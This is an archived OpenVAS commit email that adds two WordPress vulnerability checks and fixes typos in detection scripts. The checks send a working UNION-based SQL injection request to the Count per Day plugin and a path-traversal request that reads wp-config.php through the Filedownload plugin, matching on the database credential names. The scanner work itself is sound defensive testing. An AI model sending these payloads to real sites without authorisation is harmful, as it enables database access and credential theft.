[Openvas-commits] r11635 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Mon Sep 19 14:01:04 CEST 2011


Author: mime
Date: 2011-09-19 14:00:59 +0200 (Mon, 19 Sep 2011)
New Revision: 11635

Added:
   trunk/openvas-plugins/scripts/gb_wordpress_49665.nasl
   trunk/openvas-plugins/scripts/gb_wordpress_49669.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/gb_horde_gollem_detect.nasl
   trunk/openvas-plugins/scripts/secpod_lightneasy_detect.nasl
   trunk/openvas-plugins/scripts/secpod_mediawiki_detect.nasl
Log:
Added new plugins. Typo fixed. Fixed empty "tmp_version".

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-09-19 10:50:33 UTC (rev 11634)
+++ trunk/openvas-plugins/ChangeLog	2011-09-19 12:00:59 UTC (rev 11635)
@@ -1,3 +1,18 @@
+2011-09-19  Michael Meyer <michael.meyer at greenbone.net>
+
+	* scripts/gb_wordpress_49665.nasl,
+	scripts/gb_wordpress_49669.nasl:
+	Added new plugins.
+
+	* scripts/secpod_mediawiki_detect.nasl:
+	Typo fixed.
+
+	* scripts/gb_horde_gollem_detect.nasl:
+	Typo fixed.
+
+	* scripts/secpod_lightneasy_detect.nasl:
+	Fixed empty "tmp_version". 
+
 2011-09-19  Henri Doreau <henri.doreau at gmail.com>
 
 	* scripts/gb_tcptrack_detect.nasl: Fixed wrong variable name.

Modified: trunk/openvas-plugins/scripts/gb_horde_gollem_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_horde_gollem_detect.nasl	2011-09-19 10:50:33 UTC (rev 11634)
+++ trunk/openvas-plugins/scripts/gb_horde_gollem_detect.nasl	2011-09-19 12:00:59 UTC (rev 11635)
@@ -47,7 +47,7 @@
 
 include("http_func.inc");
 include("http_keepalive.inc");
-nclude("cpe.inc");
+include("cpe.inc");
 include("host_details.inc");
 
 ## Constant values

Added: trunk/openvas-plugins/scripts/gb_wordpress_49665.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_wordpress_49665.nasl	2011-09-19 10:50:33 UTC (rev 11634)
+++ trunk/openvas-plugins/scripts/gb_wordpress_49665.nasl	2011-09-19 12:00:59 UTC (rev 11635)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# WordPress Count per Day Plugin 'month' Parameter SQL Injection Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103259);
+ script_bugtraq_id(49665);
+ script_version ("1.0-$Revision$");
+
+ script_name("WordPress Count per Day Plugin 'month' Parameter SQL Injection Vulnerability");
+
+desc = "Overview:
+The 'Count per Day' plug-in for WordPress is prone to an SQL-injection
+vulnerability because it fails to sufficiently sanitize user-supplied
+data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the
+application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+Count per Day versions 2.17 and prior are vulnerable.
+
+References:
+http://www.securityfocus.com/bid/49665
+http://wordpress.org/extend/plugins/count-per-day/
+http://www.wordpress.com";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if installed WordPress is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("secpod_wordpress_detect_900182.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+if(!dir = get_dir_from_kb(port:port,app:"WordPress"))exit(0);
+url = string(dir, "/wp-content/plugins/count-per-day/notes.php?month=-1%20UNION%20ALL%20SELECT%201,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374--"); 
+
+if(http_vuln_check(port:port, url:url,pattern:"OpenVAS-SQL-Injection-Test")) {
+     
+  security_warning(port:port);
+  exit(0);
+
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_wordpress_49665.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_wordpress_49669.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_wordpress_49669.nasl	2011-09-19 10:50:33 UTC (rev 11634)
+++ trunk/openvas-plugins/scripts/gb_wordpress_49669.nasl	2011-09-19 12:00:59 UTC (rev 11635)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# WordPress Filedownload Local File Disclosure Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103258);
+ script_bugtraq_id(49669);
+ script_version ("1.0-$Revision$");
+
+ script_name("WordPress Filedownload Local File Disclosure Vulnerability");
+
+desc = "Overview:
+The Filedownload plug-in for WordPress is prone to a local file-
+disclosure vulnerability because it fails to adequately validate user-
+supplied input.
+
+Exploiting this vulnerability could allow an attacker to obtain
+potentially sensitive information from local files on computers
+running the vulnerable application. This may aid in further attacks.
+
+Filedownload 0.1 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/49669
+http://plugins.svn.wordpress.org/filedownload/trunk/filedownload.php
+http://wordpress.org/";
+
+ script_tag(name:"risk_factor", value:"High");
+ script_description(desc);
+ script_summary("Determine if installed WordPress is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("secpod_wordpress_detect_900182.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+if(!dir = get_dir_from_kb(port:port,app:"WordPress"))exit(0);
+url = string(dir,"/wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php "); 
+
+if(http_vuln_check(port:port, url:url,pattern:"DB_NAME",extra_check:make_list("DB_USER","DB_PASSWORD","DB_HOST"))) {
+     
+  security_hole(port:port);
+  exit(0);
+
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_wordpress_49669.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Modified: trunk/openvas-plugins/scripts/secpod_lightneasy_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_lightneasy_detect.nasl	2011-09-19 10:50:33 UTC (rev 11634)
+++ trunk/openvas-plugins/scripts/secpod_lightneasy_detect.nasl	2011-09-19 12:00:59 UTC (rev 11635)
@@ -96,7 +96,7 @@
     {
       if(lightNEasyVer[1]!= NULL)
       {
-        tmp_version = 
+        tmp_version = lightNEasyVer[1] + " under " + lightDir;
         set_kb_item(name:"www/"+ lightNEasyPort + "/LightNEasy/Sqlite",
                     value:tmp_version);
         security_note(data:"LightNEasy version " + lightNEasyVer[1] +

Modified: trunk/openvas-plugins/scripts/secpod_mediawiki_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_mediawiki_detect.nasl	2011-09-19 10:50:33 UTC (rev 11634)
+++ trunk/openvas-plugins/scripts/secpod_mediawiki_detect.nasl	2011-09-19 12:00:59 UTC (rev 11635)
@@ -102,7 +102,7 @@
                  " running at location " + dir +  " was detected on the host");
      
         ## build cpe and store it as host_detail
-        register__cpe(tmpVers:tmp_version, tmpExpr:"^([0-9.]+)", tmpBase:"cpe:/a:mediawiki:mediawiki:");
+        register_cpe(tmpVers:tmp_version, tmpExpr:"^([0-9.]+)", tmpBase:"cpe:/a:mediawiki:mediawiki:");
 
       }
       else {



More information about the Openvas-commits mailing list